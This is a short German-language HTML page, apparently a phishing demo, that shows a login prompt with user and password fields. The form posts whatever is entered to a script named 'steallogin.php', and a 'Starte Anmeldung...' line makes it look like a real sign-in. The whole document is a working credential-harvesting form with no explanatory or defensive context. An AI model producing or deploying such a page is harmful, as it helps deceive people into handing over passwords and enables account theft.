<html>
<body style="background-color:white;">

<p>Bitte melden Sie sich mit Ihrem Benutzernamen und Passwort an.</p>
</p>

<form action="steallogin.php" method="post">
<table>
<tr>
<td align="right">User:</td>
<td><input type="text" name="user" maxlength="10" size="20" value=""></td>
</tr>

<tr>
<td>Passwort:</td>
<td><input type="password" name="pass" maxlength="10" size="20" value=""></td>
</tr>


<tr>
<td></td>
<td><input type="submit" value="Anmelden"></td>
</tr>


</table>
</form>


<p>Starte Anmeldung...</p>
</body>
</html>